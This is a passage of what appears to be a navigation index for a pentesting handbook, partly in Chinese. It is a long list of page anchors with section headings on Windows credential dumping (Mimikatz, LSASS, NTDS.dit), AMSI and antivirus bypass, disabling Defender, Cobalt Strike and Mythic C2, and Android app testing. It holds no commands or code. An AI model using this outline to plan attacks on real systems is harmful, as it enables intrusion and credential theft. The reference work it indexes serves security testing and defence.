ec","windows-hardening/lateral-movement/wmiexec.html#工作原理解释","windows-hardening/lateral-movement/wmiexec.html#wmi-基础知识","windows-hardening/lateral-movement/wmiexec.html#命名空间","windows-hardening/lateral-movement/wmiexec.html#类","windows-hardening/lateral-movement/wmiexec.html#方法","windows-hardening/lateral-movement/wmiexec.html#wmi-枚举","windows-hardening/lateral-movement/wmiexec.html#wmi-服务状态","windows-hardening/lateral-movement/wmiexec.html#系统和进程信息","windows-hardening/lateral-movement/wmiexec.html#手动远程-wmi-查询","windows-hardening/lateral-movement/wmiexec.html#自动化工具","windows-hardening/lateral-movement/wmiexec.html#参考","windows-hardening/stealing-credentials/index.html#stealing-windows-credentials","windows-hardening/stealing-credentials/index.html#credentials-mimikatz","windows-hardening/stealing-credentials/index.html#invoke-mimikatz","windows-hardening/stealing-credentials/index.html#使用-meterpreter-的凭据","windows-hardening/stealing-credentials/index.html#绕过-av","windows-hardening/stealing-credentials/index.html#procdump--mimikatz","windows-hardening/stealing-credentials/index.html#使用--comsvcsdll--转储-lsass","windows-hardening/stealing-credentials/index.html#使用任务管理器转储-lsass","windows-hardening/stealing-credentials/index.html#使用-procdump-转储-lsass","windows-hardening/stealing-credentials/index.html#dumpin-lsass-with-pplblade","windows-hardening/stealing-credentials/index.html#crackmapexec","windows-hardening/stealing-credentials/index.html#dump-sam-hashes","windows-hardening/stealing-credentials/index.html#转储-lsa-秘密","windows-hardening/stealing-credentials/index.html#从目标-dc-转储-ntdsdit","windows-hardening/stealing-credentials/index.html#从目标-dc-转储-ntdsdit-密码历史记录","windows-hardening/stealing-credentials/index.html#显示每个-ntdsdit-账户的-pwdlastset-属性","windows-hardening/stealing-credentials/index.html#stealing-sam--system","windows-hardening/stealing-credentials/index.html#from-registry","windows-hardening/stealing-credentials/index.html#卷影复制","windows-hardening/stealing-credentials/index.html#invoke-ninjacopy","windows-hardening/stealing-credentials/index.html#active-directory-凭据---ntdsdit","windows-hardening/stealing-credentials/index.html#使用-ntdsutil-复制-ntdsdit","windows-hardening/stealing-credentials/index.html#从-ntdsdit-中提取哈希","windows-hardening/stealing-credentials/index.html#从-ntdsdit-提取域对象到-sqlite-数据库","windows-hardening/stealing-credentials/index.html#lazagne","windows-hardening/stealing-credentials/index.html#从sam和lsass提取凭据的其他工具","windows-hardening/stealing-credentials/index.html#windows-credentials-editor-wce","windows-hardening/stealing-credentials/index.html#fgdump","windows-hardening/stealing-credentials/index.html#pwdump","windows-hardening/stealing-credentials/index.html#pwdump7","windows-hardening/stealing-credentials/index.html#防御","windows-hardening/stealing-credentials/credentials-protections.html#windows-凭证保护","windows-hardening/stealing-credentials/credentials-protections.html#wdigest","windows-hardening/stealing-credentials/credentials-protections.html#lsa-protection-pp--ppl-protected-processes","windows-hardening/stealing-credentials/credentials-protections.html#what-you-need-to-know-from-an-offensive-perspective","windows-hardening/stealing-credentials/credentials-protections.html#create-a-ppl-process-at-launch-documented-api","windows-hardening/stealing-credentials/credentials-protections.html#credential-guard","windows-hardening/stealing-credentials/credentials-protections.html#rdp-restrictedadmin-mode","windows-hardening/stealing-credentials/credentials-protections.html#cached-credentials","windows-hardening/stealing-credentials/credentials-protections.html#protected-users","windows-hardening/stealing-credentials/credentials-protections.html#references","windows-hardening/stealing-credentials/credentials-mimikatz.html#mimikatz","windows-hardening/stealing-credentials/credentials-mimikatz.html#lm-和内存中的明文","windows-hardening/stealing-credentials/credentials-mimikatz.html#反制-sedebugprivilege-移除","windows-hardening/stealing-credentials/credentials-mimikatz.html#mimikatz-选项","windows-hardening/stealing-credentials/credentials-mimikatz.html#kerberos-票证攻击","windows-hardening/stealing-credentials/credentials-mimikatz.html#黄金票证创建","windows-hardening/stealing-credentials/credentials-mimikatz.html#silver-ticket-创建","windows-hardening/stealing-credentials/credentials-mimikatz.html#信任票据创建","windows-hardening/stealing-credentials/credentials-mimikatz.html#额外的-kerberos-命令","windows-hardening/stealing-credentials/credentials-mimikatz.html#active-directory-篡改","windows-hardening/stealing-credentials/credentials-mimikatz.html#凭证访问","windows-hardening/stealing-credentials/credentials-mimikatz.html#杂项","windows-hardening/stealing-credentials/credentials-mimikatz.html#权限提升","windows-hardening/stealing-credentials/credentials-mimikatz.html#凭证转储","windows-hardening/stealing-credentials/credentials-mimikatz.html#sid-和-token-操作","windows-hardening/stealing-credentials/credentials-mimikatz.html#终端服务","windows-hardening/stealing-credentials/credentials-mimikatz.html#vault","windows-hardening/stealing-credentials/wts-impersonator.html#核心功能","windows-hardening/stealing-credentials/wts-impersonator.html#关键模块和用法","windows-hardening/basic-cmd-for-pentesters.html#basic-win-cmd-for-pentesters","windows-hardening/basic-cmd-for-pentesters.html#系统信息","windows-hardening/basic-cmd-for-pentesters.html#版本和补丁信息","windows-hardening/basic-cmd-for-pentesters.html#环境","windows-hardening/basic-cmd-for-pentesters.html#挂载的磁盘","windows-hardening/basic-cmd-for-pentesters.html#defender","windows-hardening/basic-cmd-for-pentesters.html#回收站","windows-hardening/basic-cmd-for-pentesters.html#进程服务和软件","windows-hardening/basic-cmd-for-pentesters.html#域信息","windows-hardening/basic-cmd-for-pentesters.html#日志与事件","windows-hardening/basic-cmd-for-pentesters.html#用户与组","windows-hardening/basic-cmd-for-pentesters.html#用户","windows-hardening/basic-cmd-for-pentesters.html#组","windows-hardening/basic-cmd-for-pentesters.html#列出会话","windows-hardening/basic-cmd-for-pentesters.html#密码策略","windows-hardening/basic-cmd-for-pentesters.html#凭据","windows-hardening/basic-cmd-for-pentesters.html#持久性与用户","windows-hardening/basic-cmd-for-pentesters.html#网络","windows-hardening/basic-cmd-for-pentesters.html#接口路由端口主机和dns缓存","windows-hardening/basic-cmd-for-pentesters.html#防火墙","windows-hardening/basic-cmd-for-pentesters.html#共享","windows-hardening/basic-cmd-for-pentesters.html#wifi","windows-hardening/basic-cmd-for-pentesters.html#snmp","windows-hardening/basic-cmd-for-pentesters.html#网络接口","windows-hardening/basic-cmd-for-pentesters.html#arp-表","windows-hardening/basic-cmd-for-pentesters.html#下载","windows-hardening/basic-cmd-for-pentesters.html#杂项","windows-hardening/basic-cmd-for-pentesters.html#绕过字符黑名单","windows-hardening/basic-cmd-for-pentesters.html#dosfuscation","windows-hardening/basic-cmd-for-pentesters.html#监听地址-acls","windows-hardening/basic-cmd-for-pentesters.html#手动-dns-shell","windows-hardening/basic-cmd-for-pentesters.html#从-c-代码调用-cmd","windows-hardening/basic-cmd-for-pentesters.html#alternate-data-streams-cheatsheet-adsalternate-data-stream","windows-hardening/basic-powershell-for-pentesters/index.html#basic-powershell-for-pentesters","windows-hardening/basic-powershell-for-pentesters/index.html#默认-powershell-位置","windows-hardening/basic-powershell-for-pentesters/index.html#基本的-ps-命令入门","windows-hardening/basic-powershell-for-pentesters/index.html#下载与执行","windows-hardening/basic-powershell-for-pentesters/index.html#下载并在后台执行带有-amsi-绕过","windows-hardening/basic-powershell-for-pentesters/index.html#从linux使用b64","windows-hardening/basic-powershell-for-pentesters/index.html#下载","windows-hardening/basic-powershell-for-pentesters/index.html#systemnetwebclient","windows-hardening/basic-powershell-for-pentesters/index.html#invoke-webrequest","windows-hardening/basic-powershell-for-pentesters/index.html#wget","windows-hardening/basic-powershell-for-pentesters/index.html#bitstransfer","windows-hardening/basic-powershell-for-pentesters/index.html#base64-kali--encodedcommand","windows-hardening/basic-powershell-for-pentesters/index.html#执行策略","windows-hardening/basic-powershell-for-pentesters/index.html#受限语言","windows-hardening/basic-powershell-for-pentesters/index.html#applocker-策略","windows-hardening/basic-powershell-for-pentesters/index.html#启用-winrm-远程-ps","windows-hardening/basic-powershell-for-pentesters/index.html#禁用-defender","windows-hardening/basic-powershell-for-pentesters/index.html#amsi-绕过","windows-hardening/basic-powershell-for-pentesters/index.html#amsi-bypass-2---管理api调用钩子","windows-hardening/basic-powershell-for-pentesters/index.html#amsi-bypass-3---sedebug特权","windows-hardening/basic-powershell-for-pentesters/index.html#amsi-bypass---更多资源","windows-hardening/basic-powershell-for-pentesters/index.html#ps-history","windows-hardening/basic-powershell-for-pentesters/index.html#查找较新的文件","windows-hardening/basic-powershell-for-pentesters/index.html#获取权限","windows-hardening/basic-powershell-for-pentesters/index.html#操作系统版本和补丁","windows-hardening/basic-powershell-for-pentesters/index.html#环境","windows-hardening/basic-powershell-for-pentesters/index.html#其他连接的驱动器","windows-hardening/basic-powershell-for-pentesters/index.html#回收站","windows-hardening/basic-powershell-for-pentesters/index.html#域侦查","windows-hardening/basic-powershell-for-pentesters/index.html#用户","windows-hardening/basic-powershell-for-pentesters/index.html#安全字符串到明文","windows-hardening/basic-powershell-for-pentesters/index.html#sudo","windows-hardening/basic-powershell-for-pentesters/index.html#组","windows-hardening/basic-powershell-for-pentesters/index.html#剪贴板","windows-hardening/basic-powershell-for-pentesters/index.html#进程","windows-hardening/basic-powershell-for-pentesters/index.html#服务","windows-hardening/basic-powershell-for-pentesters/index.html#从安全字符串获取密码","windows-hardening/basic-powershell-for-pentesters/index.html#计划任务","windows-hardening/basic-powershell-for-pentesters/index.html#网络","windows-hardening/basic-powershell-for-pentesters/index.html#端口扫描","windows-hardening/basic-powershell-for-pentesters/index.html#接口","windows-hardening/basic-powershell-for-pentesters/index.html#防火墙","windows-hardening/basic-powershell-for-pentesters/index.html#路由","windows-hardening/basic-powershell-for-pentesters/index.html#arp","windows-hardening/basic-powershell-for-pentesters/index.html#主机","windows-hardening/basic-powershell-for-pentesters/index.html#ping","windows-hardening/basic-powershell-for-pentesters/index.html#snmp","windows-hardening/basic-powershell-for-pentesters/index.html#将sddl字符串转换为可读格式","windows-hardening/basic-powershell-for-pentesters/powerview.html#powerviewsharpview","windows-hardening/basic-powershell-for-pentesters/powerview.html#快速枚举","windows-hardening/basic-powershell-for-pentesters/powerview.html#域信息","windows-hardening/basic-powershell-for-pentesters/powerview.html#用户组计算机和组织单位","windows-hardening/basic-powershell-for-pentesters/powerview.html#登录和会话","windows-hardening/basic-powershell-for-pentesters/powerview.html#组策略对象---gpos","windows-hardening/basic-powershell-for-pentesters/powerview.html#acl","windows-hardening/basic-powershell-for-pentesters/powerview.html#共享文件和文件夹","windows-hardening/basic-powershell-for-pentesters/powerview.html#域信任","windows-hardening/basic-powershell-for-pentesters/powerview.html#低垂的果实","windows-hardening/basic-powershell-for-pentesters/powerview.html#删除的对象","windows-hardening/basic-powershell-for-pentesters/powerview.html#misc","windows-hardening/av-bypass.html#杀毒软件-av-绕过","windows-hardening/av-bypass.html#停止-defender","windows-hardening/av-bypass.html#av-绕过方法论","windows-hardening/av-bypass.html#static-detection","windows-hardening/av-bypass.html#dynamic-analysis","windows-hardening/av-bypass.html#exes-vs-dlls","windows-hardening/av-bypass.html#dll-sideloading--proxying","windows-hardening/av-bypass.html#滥用-forwarded-exports-forwardsideloading","windows-hardening/av-bypass.html#freeze","windows-hardening/av-bypass.html#amsi-反恶意软件扫描接口","windows-hardening/av-bypass.html#blocking-amsi-by-preventing-amsidll-load-ldrloaddll-hook","windows-hardening/av-bypass.html#ps-日志记录","windows-hardening/av-bypass.html#obfuscation","windows-hardening/av-bypass.html#deobfuscating-confuserex-protected-net-binaries","windows-hardening/av-bypass.html#smartscreen--motw","windows-hardening/av-bypass.html#etw","windows-hardening/av-bypass.html#c-assembly-reflection","windows-hardening/av-bypass.html#using-other-programming-languages","windows-hardening/av-bypass.html#tokenstomping","windows-hardening/av-bypass.html#using-trusted-software","windows-hardening/av-bypass.html#chrome-remote-desktop","windows-hardening/av-bypass.html#advanced-evasion","windows-hardening/av-bypass.html#old-techniques","windows-hardening/av-bypass.html#check-which-parts-defender-finds-as-malicious","windows-hardening/av-bypass.html#telnet-server","windows-hardening/av-bypass.html#ultravnc","windows-hardening/av-bypass.html#greatsct","windows-hardening/av-bypass.html#编译我们自己的-reverse-shell","windows-hardening/av-bypass.html#c-使用编译器","windows-hardening/av-bypass.html#c","windows-hardening/av-bypass.html#使用-python-构建注入器示例","windows-hardening/av-bypass.html#其他工具","windows-hardening/av-bypass.html#更多","windows-hardening/av-bypass.html#bring-your-own-vulnerable-driver-byovd--killing-avedr-from-kernel-space","windows-hardening/av-bypass.html#bypassing-zscaler-client-connector-posture-checks-via-on-disk-binary-patching","windows-hardening/av-bypass.html#利用-protected-process-light-ppl-和-lolbins-篡改-avedr","windows-hardening/av-bypass.html#参考资料","windows-hardening/cobalt-strike.html#cobalt-strike","windows-hardening/cobalt-strike.html#listeners","windows-hardening/cobalt-strike.html#c2-listeners","windows-hardening/cobalt-strike.html#peer2peer-listeners","windows-hardening/cobalt-strike.html#生成和托管有效载荷","windows-hardening/cobalt-strike.html#信标选项","windows-hardening/cobalt-strike.html#opsec","windows-hardening/cobalt-strike.html#execute-assembly","windows-hardening/cobalt-strike.html#作为用户操作","windows-hardening/cobalt-strike.html#使用计算机帐户","windows-hardening/cobalt-strike.html#使用无状态有效载荷","windows-hardening/cobalt-strike.html#令牌和令牌存储","windows-hardening/cobalt-strike.html#防护措施","windows-hardening/cobalt-strike.html#票证加密","windows-hardening/cobalt-strike.html#避免默认设置","windows-hardening/cobalt-strike.html#绕过内存扫描","windows-hardening/cobalt-strike.html#嘈杂的进程注入","windows-hardening/cobalt-strike.html#spawnas--pid和ppid关系","windows-hardening/cobalt-strike.html#代理攻击者流量","windows-hardening/cobalt-strike.html#更改-powershell","windows-hardening/cobalt-strike.html#更改-var_code---polop","windows-hardening/cobalt-strike.html#x----ar","windows-hardening/mythic.html#mythic","windows-hardening/mythic.html#什么是-mythic","windows-hardening/mythic.html#安装","windows-hardening/mythic.html#代理","windows-hardening/mythic.html#c2-配置文件","windows-hardening/mythic.html#apollo-agent","windows-hardening/mythic.html#常见操作","windows-hardening/mythic.html#权限提升","windows-hardening/mythic.html#进程执行","windows-hardening/mythic.html#mithic-forge","windows-hardening/mythic.html#powershell--脚本执行","windows-hardening/mythic.html#横向移动","windows-hardening/mythic.html#其他命令","windows-hardening/mythic.html#poseidon-agent","windows-hardening/mythic.html#常见操作-1","windows-hardening/mythic.html#搜索敏感信息","windows-hardening/mythic.html#横向移动-1","windows-hardening/mythic.html#进程执行-1","mobile-pentesting/android-checklist.html#android-apk-checklist","mobile-pentesting/android-checklist.html#学习-android-基础","mobile-pentesting/android-checklist.html#静态分析","mobile-pentesting/android-checklist.html#动态分析","mobile-pentesting/android-checklist.html#一些混淆反混淆信息","mobile-pentesting/android-app-pentesting/index.html#android-应用-pentesting","mobile-pentesting/android-app-pentesting/index.html#android-应用-基础","mobile-pentesting/android-app-pentesting/index.html#adb-android-debug-bridge","mobile-pentesting/android-app-pentesting/index.html#smali","mobile-pentesting/android-app-pentesting/index.html#other-interesting-tricks","mobile-pentesting/android-app-pentesting/index.html#案例研究与漏洞","mobile-pentesting/android-app-pentesting/index.html#静态分析","mobile-pentesting/android-app-pentesting/index.html#查找有价值的信息","mobile-pentesting/android-app-pentesting/index.html#对应用的基本理解---manifestxml-stringsxml","mobile-pentesting/android-app-pentesting/index.html#tapjacking","mobile-pentesting/android-app-pentesting/index.html#task-hijacking","mobile-pentesting/android-app-pentesting/index.html#不安全的数据存储","mobile-pentesting/android-app-pentesting/index.html#broken-tls","mobile-pentesting/android-app-pentesting/index.html#broken-cryptography","mobile-pentesting/android-app-pentesting/index.html#other-checks","mobile-pentesting/android-app-pentesting/index.html#react-native-application","mobile-pentesting/android-app-pentesting/index.html#xamarin-applications","mobile-pentesting/android-app-pentesting/index.html#superpacked-applications","mobile-pentesting/android-app-pentesting/index.html#automated-static-code-analysis","mobile-pentesting/android-app-pentesting/index.html#secrets-leaked","mobile-pentesting/android-app-pentesting/index.html#bypass-biometric-authentication","mobile-pentesting/android-app-pentesting/index.html#other-interesting-functions","mobile-pentesting/android-app-pentesting/index.html#other-tricks","mobile-pentesting/android-app-pentesting/index.html#dynamic-analysis","mobile-pentesting/android-app-pentesting/index.html#online-dynamic-analysis","mobile-pentesting/android-app-pentesting/index.html#local-dynamic-analysis","mobile-pentesting/android-app-pentesting/index.html#unintended-data-leakage","mobile-pentesting/android-app-pentesting/index.html#sqlite-dbs","mobile-pentesting/android-app-pentesting/index.html#drozer-exploit-activities-content-providers-and-services","mobile-pentesting/android-app-pentesting/index.html#exploiting-exported-activities","mobile-pentesting/android-app-pentesting/index.html#exploiting-content-providers---accessing-and-manipulating-sensitive-information","mobile-pentesting/android-app-pentesting/index.html#exploiting-services","mobile-pentesting/android-app-pentesting/index.html#exploiting-broadcast-receivers","mobile-pentesting/android-app-pentesting/index.html#exploiting-schemes--deep-links","mobile-pentesting/android-app-pentesting/index.html#传输层检测与验证失败","mobile-pentesting/android-app-pentesting/index.html#frida","mobile-pentesting/android-app-pentesting/index.html#dump-memory---fridump","mobile-pentesting/android-app-pentesting/index.html#keystore-中的敏感数据","mobile-pentesting/android-app-pentesting/index.html#fingerprintbiometrics-bypass","mobile-pentesting/android-app-pentesting/index.html#后台图像","mobile-pentesting/android-app-pentesting/index.html#android-application-analyzer","mobile-pentesting/android-app-pentesting/index.html#intent-injection","mobile-pentesting/android-app-pentesting/index.html#关键要点","mobile-pentesting/android-app-pentesting/index.html#android-客户端注入及其他","mobile-pentesting/android-app-pentesting/index.html#自动分析","mobile-pentesting/android-app-pentesting/index.html#mobsf","mobile-pentesting/android-app-pentesting/index.html#assisted-dynamic-analysis-with-mobsf","mobile-pentesting/android-app-pentesting/index.html#assisted-dynamic-analysis-with-inspeckage","mobile-pentesting/android-app-pentesting/index.html#yaazhini","mobile-pentesting/android-app-pentesting/index.html#qark","mobile-pentesting/android-app-pentesting/index.html#reverseapk","mobile-pentesting/android-app-pentesting/index.html#super-android-analyzer","mobile-pentesting/android-app-pentesting/index.html#stacoan","mobile-pentesting/android-app-pentesting/index.html#androbugs","mobile-pentesting/android-app-pentesting/index.html#androwarn","mobile-pentesting/android-app-pentesting/index.html#mara-framework","mobile-pentesting/android-app-pentesting/index.html#koodous","mobile-pentesting/android-app-pentesting/index.html#混淆去混淆-代码","mobile-pentesting/android-app-pentesting/index.html#proguard","mobile-pentesting/android-app-pentesting/index.html#dexguard","mobile-pentesting/android-app-pentesting/index.html#deguard","mobile-pentesting/android-app-pentesting/index.html#deobfuscate-android-apphttpsgithubcomin3tinctdeobfuscate-android-app","mobile-pentesting/android-app-pentesting/index.html#simplify","mobile-pentesting/android-app-pentesting/index.html#apkid","mobile-pentesting/android-app-pentesting/index.html#manual","mobile-pentesting/android-app-pentesting/index.html#实验室","mobile-pentesting/android-app-pentesting/index.html#androl4b","mobile-pentesting/android-app-pentesting/index.html#参考资料","mobile-pentesting/android-app-pentesting/index.html#待尝试","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#android-无障碍服务滥用","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#概述","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#请求权限","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#远程-ui-自动化-原语","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#滥用模式","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#1-overlay-phishing-credential-harvesting","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#2-on-device-fraud-automation","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#3-screen-streaming--monitoring","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#playpraetor--command--control-workflow","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#detecting-malicious-accessibility-services","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#hardening-recommendations-for-app-developers","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#ats-automation-cheat-sheet-accessibility-driven","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#基于文本的伪屏幕流","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#device-admin-胁迫原语","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#加密钱包助记词提取模式","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#nfc-relay-orchestration","mobile-pentesting/android-app-pentesting/accessibility-services-abuse.html#参考资料","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#android-反检测与-ssl-pinning-绕过-fridaobjection","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#detection-surface-what-apps-check","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#step-1--quick-win-hide-root-with-magisk-denylist","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#step-2--30second-frida-codeshare-tests","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#使用-medusa-自动化-frida-framework","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#step-3--通过延迟-attach-绕过-init-time-检测器","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#step-4--通过-jadx-和字符串搜寻映射检测逻辑","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#第5步--runtime-stubbing-with-frida-java","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#bypass-emulatorvm-detection-java-stubs","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#ssl-pinning-bypass-quick-hook-java","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#第-6-步--当-java-hooks-失败时跟随-jninative-轨迹","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#step-7--objection-patching-embed-gadget--strip-basics","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#第-8-步--备用修补-tls-pinning-以便查看网络流量","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#便捷命令速查表","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#universal-proxy-forcing--tls-unpinning-http-toolkit-frida-hooks","mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.html#参考资料","mobile-pentesting/android-app-pentesting/android-applications-basics.html#android-applications-basics","mobile-pentesting/android-app-pentesting/android-applications-basics.html#android-security-model","mobile-pentesting/android-app-pentesting/android-applications-basics.html#uid-separation","mobile-pentesting/android-app-pentesting/android-applications-basics.html#uid-sharing","mobile-pentesting/android-app-pentesting/android-applications-basics.html#sandboxing","mobile-pentesting/android-app-pentesting/android-applications-basics.html#permissions","mobile-pentesting/android-app-pentesting/android-applications-basics.html#pre-installed-applications","mobile-pentesting/android-app-pentesting/android-applications-basics.html#rooting","mobile-pentesting/android-app-pentesting/android-applications-basics.html#roms","mobile-pentesting/android-app-pentesting/android-applications-basics.html#implications","mobile-pentesting/android-app-pentesting/android-applications-basics.html#android-application-fundamentals","mobile-pentesting/android-app-pentesting/android-applications-basics.html#dalvik--smali","mobile-pentesting/android-app-pentesting/android-applications-basics.html#intents","mobile-pentesting/android-app-pentesting/android-applications-basics.html#intent-filter","mobile-pentesting/android-app-pentesting/android-applications-basics.html#隐式意图","mobile-pentesting/android-app-pentesting/android-applications-basics.html#explicit-intents","mobile-pentesting/android-app-pentesting/android-applications-basics.html#pending-intents","mobile-pentesting/android-app-pentesting/android-applications-basics.html#broadcast-intents","mobile-pentesting/android-app-pentesting/android-applications-basics.html#sticky-broadcasts","mobile-pentesting/android-app-pentesting/android-applications-basics.html#deep-links--url-schemes","mobile-pentesting/android-app-pentesting/android-applications-basics.html#aidl---android接口定义语言","mobile-pentesting/android-app-pentesting/android-applications-basics.html#关键概念","mobile-pentesting/android-app-pentesting/android-applications-basics.html#组件","mobile-pentesting/android-app-pentesting/android-applications-basics.html#启动活动和其他活动","mobile-pentesting/android-app-pentesting/android-applications-basics.html#应用子类","mobile-pentesting/android-app-pentesting/android-applications-basics.html#services","mobile-pentesting/android-app-pentesting/android-applications-basics.html#广播接收器","mobile-pentesting/android-app-pentesting/android-applications-basics.html#内容提供者","mobile-pentesting/android-app-pentesting/android-applications-basics.html#webviews","mobile-pentesting/android-app-pentesting/android-applications-basics.html#其他应用组件和移动设备管理","mobile-pentesting/android-app-pentesting/android-applications-basics.html#应用程序的数字签名","mobile-pentesting/android-app-pentesting/android-applications-basics.html#应用验证以增强安全性","mobile-pentesting/android-app-pentesting/android-applications-basics.html#移动设备管理-mdm","mobile-pentesting/android-app-pentesting/android-applications-basics.html#枚举和利用-aidl--binder-服务","mobile-pentesting/android-app-pentesting/android-applications-basics.html#1-发现正在运行的服务","mobile-pentesting/android-app-pentesting/android-applications-basics.html#2-获取接口描述符ping","mobile-pentesting/android-app-pentesting/android-applications-basics.html#3-调用事务","mobile-pentesting/android-app-pentesting/android-applications-basics.html#4-暴力破解未知方法","mobile-pentesting/android-app-pentesting/android-applications-basics.html#5-通过-ontransact-映射代码--方法","mobile-pentesting/android-app-pentesting/android-applications-basics.html#6-发现缺失的权限检查","mobile-pentesting/android-app-pentesting/android-applications-basics.html#7-自动化评估","mobile-pentesting/android-app-pentesting/android-applications-basics.html#参考文献","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#android-任务劫持","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#任务后栈和前台活动","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#任务亲和力攻击","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#经典的-singletask--strandhogg-场景","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#默认亲和力无-singletask变体--来电显示案例研究","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#strandhogg-20-cve-2020-0096--基于反射的任务劫持","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#检测与利用清单","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#缓解措施","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#相关-ui-劫持技术","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#参考文献","mobile-pentesting/android-app-pentesting/adb-commands.html#连接","mobile-pentesting/android-app-pentesting/adb-commands.html#多个设备","mobile-pentesting/android-app-pentesting/adb-commands.html#端口隧道","mobile-pentesting/android-app-pentesting/adb-commands.html#包管理器","mobile-pentesting/android-app-pentesting/adb-commands.html#安装卸载","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-install-option","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-uninstall-options","mobile-pentesting/android-app-pentesting/adb-commands.html#包","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-pm-list-packages-options","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-pm-path","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-pm-clear","mobile-pentesting/android-app-pentesting/adb-commands.html#文件管理器","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-pull--local","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-push","mobile-pentesting/android-app-pentesting/adb-commands.html#屏幕捕获屏幕录制","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-screencap","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-screenrecord-options","mobile-pentesting/android-app-pentesting/adb-commands.html#shell","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-1","mobile-pentesting/android-app-pentesting/adb-commands.html#pm","mobile-pentesting/android-app-pentesting/adb-commands.html#进程","mobile-pentesting/android-app-pentesting/adb-commands.html#系统","mobile-pentesting/android-app-pentesting/adb-commands.html#日志","mobile-pentesting/android-app-pentesting/adb-commands.html#logcat","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-logcat-选项-过滤规范","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-logcat--b","mobile-pentesting/android-app-pentesting/adb-commands.html#dumpsys","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-dumpsys-options","mobile-pentesting/android-app-pentesting/adb-commands.html#备份","mobile-pentesting/android-app-pentesting/apk-decompilers.html#apk-decompilers","mobile-pentesting/android-app-pentesting/apk-decompilers.html#jd-gui","mobile-pentesting/android-app-pentesting/apk-decompilers.html#jadx","mobile-pentesting/android-app-pentesting/apk-decompilers.html#gda-android-reversing-tool","mobile-pentesting/android-app-pentesting/apk-decompilers.html#bytecode-viewer","mobile-pentesting/android-app-pentesting/apk-decompilers.html#enjarify","mobile-pentesting/android-app-pentesting/apk-decompilers.html#cfr","mobile-pentesting/android-app-pentesting/apk-decompilers.html#fernflower","mobile-pentesting/android-app-pentesting/apk-decompilers.html#krakatau","mobile-pentesting/android-app-pentesting/apk-decompilers.html#procyon","mobile-pentesting/android-app-pentesting/apk-decompilers.html#frida-dexdump","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#avd---android-虚拟设备","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#什么是","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#gui","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#prepare-virtual-machine","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#run-virtual-machine","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#command-line-tool","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#运行虚拟机","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#命令行选项","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#linux-cli-setup-sdkavd-quickstart","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#来自-cli-的快照","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#armx86-二进制翻译-android-11","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#在-play-store-设备上获取-root","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#install-burp-c